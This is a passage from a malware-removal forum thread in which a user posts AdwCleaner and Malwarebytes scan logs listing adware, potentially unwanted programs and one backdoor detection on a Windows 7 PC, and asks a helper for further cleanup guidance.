  • MBAM.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

 

logo-25.pngID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~


#9 jsutbee

jsutbee
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:11:39 AM

Posted 06 August 2014 - 04:35 AM

HI Toffee,

here's my log from adwcleaner[s2]

 

-----------------------------------------------------

 

# AdwCleaner v3.302 - Report created 06/08/2014 at 14:28:30
# Updated 30/07/2014 by Xplode
# Operating System : Windows 7 Ultimate  (32 bits)
# Username : User - BIKASH
# Running from : C:\Users\User\Desktop\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
Folder Deleted : C:\ProgramData\AVG Secure Search
Folder Deleted : C:\ProgramData\AVG Security Toolbar
Folder Deleted : C:\Program Files\Common Files\AVG Secure Search
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKLM\SOFTWARE\Classes\AppID\ViProtocol.DLL
Key Deleted : HKLM\SOFTWARE\Classes\protocols\handler\viprotocol
Key Deleted : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi
Key Deleted : HKLM\SOFTWARE\Classes\ScriptHelper.ScriptHelperApi.1
Key Deleted : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE
Key Deleted : HKLM\SOFTWARE\Classes\ViProtocol.ViProtocolOLE.1
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\avg-secure-search-installer_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\avg-secure-search-installer_RASMANCS
Value Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [vProt]
Key Deleted : HKLM\SOFTWARE\MozillaPlugins\@avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{1FDFF5A2-7BB1-48E1-8081-7236812B12B2}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{933B95E2-E7B7-4AD9-B952-7AC336682AE3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{B658800C-F66E-4EF3-AB85-6C0C227862A9}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4E92DB5F-AAD9-49D3-8EAB-B40CBE5B1FF7}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{C401D2CE-DC27-45C7-BC0C-8E6EA7F085D6}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{74FB6AFD-DD77-4CEB-83BD-AB2B63E63C93}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{C2AC8A0E-E48E-484B-A71C-C7A937FAAB94}
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{F25AF245-4A81-40DC-92F9-E9021F207706}
Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{F25AF245-4A81-40DC-92F9-E9021F207706}
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16421
 
 
-\\ Mozilla Firefox v29.0 (en-US)
 
[ File : C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\prefs.js ]
 
Line Deleted : user_pref("extensions.aRNEOMVW50611856ZKVKQ22976610com61908.61908.internaldb.monetization_plugin_bundledUrls.value", "%7B%22dealply_s%22%3A%7B%22urls%22%3A%5B%22ssfiles.com%22%5D%7D%2C%22dealply_p%22%[...]
Line Deleted : user_pref("extensions.crossrider.bic", "1479034d316ce3ccaedb831909733ee9");
 
[ File : C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\extensions\prefs.js ]
 
 
-\\ Google Chrome v36.0.1985.125
 
[ File : C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
Deleted [Extension] : ndibdjnfmopecpmkdieinmbadjfpblof
 
*************************
 
AdwCleaner[R0].txt - [25331 octets] - [30/07/2014 16:01:56]
AdwCleaner[R1].txt - [1138 octets] - [31/07/2014 10:16:57]
AdwCleaner[R2].txt - [3503 octets] - [06/08/2014 10:18:27]
AdwCleaner[R3].txt - [3536 octets] - [06/08/2014 14:26:29]
AdwCleaner[S0].txt - [25587 octets] - [30/07/2014 16:25:18]
AdwCleaner[S1].txt - [1200 octets] - [31/07/2014 10:18:35]
AdwCleaner[S2].txt - [3511 octets] - [06/08/2014 14:28:30]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [3571 octets] ##########
 
And here is my next MBAM log from mbam.txt that i exported
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/6/2014
Scan Time: 3:04:28 PM
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.08.06.02
Rootkit Database: v2014.08.04.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled
 
OS: Windows 7
CPU: x86
File System: NTFS
User: User
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 420307
Time Elapsed: 10 min, 17 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 11
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\CLSID\{9BB812EA-6A11-4F94-AE32-DB3FD45EC496}, , [94c6279cadce5dd970c0fea2de2431cf], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\TYPELIB\{66B51873-B53D-42EC-BC1A-862EB4DB041D}, , [94c6279cadce5dd970c0fea2de2431cf], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{D01C1E11-ED7A-4791-8408-E63EECDA48FF}, , [94c6279cadce5dd970c0fea2de2431cf], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\INTERFACE\{5C6B193D-C4D0-4A0C-8509-8EA566380A7C}, , [5802f4cf98e36bcb1b17564a13efe61a], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\CLASSES\TypeLib\{BDB0F124-48E8-43A5-A263-45A7093CF058}, , [70eab21183f81e183200752b03ffbf41], 
PUP.Optional.RichMediaView.A, HKLM\SOFTWARE\RichMediaViewV1release335, , [42185f6491eaa88ee4d4f3f26c96847c], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\kbanbanalocifhgjcppngcdgminjckhm, , [c496fdc6daa159dd9a035d7d679b1de3], 
PUP.Optional.uTorrentTB.A, HKLM\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\pacgpkgadgmibnhpdidcnfafllnmeomc, , [372304bf1c5f55e1fe3eeb037f839967], 
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\ZIP ENHANCER, , [afabdae9d6a543f3debdf0ea40c252ae], 
PUP.Optional.PlusHD.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\HD-V1.9, , [aeac80431c5fd561ad8db42ce121956b], 
PUP.Optional.SavePass.A, HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\SavePass, , [91c91ba86a11bd798451aa3e6a98cb35], 
 
Registry Values: 10
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@zipenhancer.com, C:\Program Files\AmiExt\ZipEnhancer\ff, , [32287152b0cbde584e4e6e6cfb076997]
PUP.Optional.WebExpEnhanced.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@WebexpEnhancedV1alpha26.net, C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha26\ff, , [2e2c2c97c3b8f73fe88c0fed6f93b947]
PUP.Optional.VideoPlayer.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@VideoPlayerV3beta10835.net, C:\Program Files\VideoPlayerV3\VideoPlayerV3beta10835\ff, , [d5858c37136865d154a5b042b949c53b]
PUP.Optional.MediaPlayerAlpha.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaPlayerV1alpha583.net, C:\Program Files\MediaPlayerV1\MediaPlayerV1alpha583\ff, , [6af0457e07747eb8e6e8837936cc31cf]
PUP.Optional.MediaViewer.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaViewerV1alpha442.net, C:\Program Files\MediaViewerV1\MediaViewerV1alpha442\ff, , [5cfedfe44d2e7cba171f0aeedd2553ad]
PUP.Optional.MediaView.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaViewV1alpha678.net, C:\Program Files\MediaViewV1\MediaViewV1alpha678\ff, , [1f3b467d7b00be781d6c698e847e1ee2]
PUP.Optional.MediaWatch.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaWatchV1home1288.net, C:\Program Files\MediaWatchV1\MediaWatchV1home1288\ff, , [67f32c97502b4cea1fa5d55a3fc554ac]
PUP.Optional.MediaBuzz.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@MediaBuzzV1mode6898.net, C:\Program Files\MediaBuzzV1\MediaBuzzV1mode6898\ff, , [d08ac6fd29526cca425d35b68f73ff01]
PUP.Optional.RichMediaView.A, HKLM\SOFTWARE\MOZILLA\FIREFOX\EXTENSIONS|ext@RichMediaViewV1release335.net, C:\Program Files\RichMediaViewV1\RichMediaViewV1release335\ff, , [f466903386f579bd5f5800e58b77f808]
PUP.Optional.Amonetize.A, HKLM\SOFTWARE\ZIP ENHANCER|Path, C:\Program Files\AmiExt\ZipEnhancer, , [afabdae9d6a543f3debdf0ea40c252ae]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 14
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config, , [5bfff4cfa5d6c86e1b28fcdce02224dc], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults\preferences, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\plugins, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\userCode, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\locale\en-US, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\skin, , [79e14d767cff2e08d130755b34ce07f9], 
 
Files: 119
PUP.Optional.Bandoo, C:\Users\User\Downloads\iLividSetup-r362-n-bc.exe, , [3f1b477caecd94a2e3d99c77d22fdb25], 
PUP.Optional.Amonetize, C:\Users\User\AppData\Local\1682\a19451.exe, , [59011aa97efd0b2b46aeaaf6837ec33d], 
Backdoor.IRCBot, C:\Users\User\AppData\Local\1682\a19451mgr.exe, , [67f3f2d1f28905317b125ac38a7759a7], 
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config\ver.xml, , [5bfff4cfa5d6c86e1b28fcdce02224dc], 
PUP.Optional.OffersWizard.A, C:\Program Files\Common Files\Config\uninstinethnfd.exe, , [5bfff4cfa5d6c86e1b28fcdce02224dc], 
PUP.Optional.MindSpark.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_radiorage.dl.tb.ask.com_0.localstorage, , [5406f2d167149b9bcb3742a85ca641bf], 
PUP.Optional.MindSpark.A, C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_radiorage.dl.tb.ask.com_0.localstorage-journal, , [b9a1507353282214da289a50ed15b749], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome.manifest, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\install.rdf, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\3a198c50364e5de2a7b2256a2a71b8a2.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\4560a041a18e5c805686aca2fbbf7fac.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\aa62f988d870591179a338ca156cdc15.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\background.html, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\browser.xul, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\d3f3b4ca28206b48d6a5676ba7ba0c10.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\dialog.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\ef029b9a7e24e1a38853d7e5cf38c43b.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\fa2c47838609abcf29f7cdc8d7b8564c.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\ffCoreFilesIndex.txt, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\options.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\options.xul, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\search_dialog.xul, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\775b907e74651ad97a762623558b5cab.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\0c35837f9a11ea63529cc80cee467197.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\11fe0e663f6fb46289354ddc3fbefbd0.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\219bf4e6abfc1d5d6225552064590680.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\24e8e8f96bde5769fc6fca85d218a808.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\277c5ae40aecc6034a98d083cd558fc2.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\379326b295af3787ab8dfc2f0d5ee7c8.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\4423f19478213ffdfb956f0806330e92.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\4d9663a851b96485807749e976f70ef5.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\8c5f775b0beefb8ee4bf49ac7c7f742c.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\9765f2fc44bc0ea593d57f48c482d053.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\b81ef4f7ddb1fae1efda5bb85912ba27.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\be92fe0bb2acf264dd48214a61c22ce4.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\dbe5dedc6afbdc4734c2634e774a9516.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\e975e057c019d3a4bab75c3654ae0964.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\api\ff1376e0d31ad66e9ec20defbf442981.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\d30b8adc9983626b8df7e160b37ab0c2.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\152c606d278fe66645f007ac2ec8ebdb.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\30c8b8ffbca4cefb5594c643a948742d.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\46ec2a4c74fe0461a3a60604984b4704.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\57d56ec60f4db1fa15955737bea73010.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\645f7bd0b4191d57dbe3eb8c9c4743fa.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\647bc88cb26ca6bedc974d074d4c54a5.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\92ff82a28e0b7b5fa9498a4ac36cf0ea.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\9ec430247724ff1f8abb1c685d0f3e41.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\aa76783cbe26f72d0989ebb7f1458af5.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\ab92aafe090eea44afe635c843530762.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\b6288df75deb1a1e0da423c8989a680f.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\bd1fddb8e7c2c7233e86af8174c0c640.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\bf7c7a62f0a464f3a46e339f5ec099c6.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\db23ddb634b535c06fb73c202c288b4d.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\de1752a9b55f28f2979e43867ea3876b.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\df7209e025c9077312341da96af47f94.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\f123638ad581430dfdc3fe9b855494ba.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\f53e02dbfad465bc508ed33e95917081.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\fcaf309745579a3dedb0cc1a8ebfd8a9.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\chrome\content\core\installer.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\defaults\preferences\prefs.js, , [79e14d767cff2e08d130755b34ce07f9], 
PUP.Optional.CrossRider.A, C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\extensions\RNEOMVW50611856@ZKVKQ22976610.com\extensionData\manifest.xml, , [79e14d767cff2e08d130755b34ce07f9], 
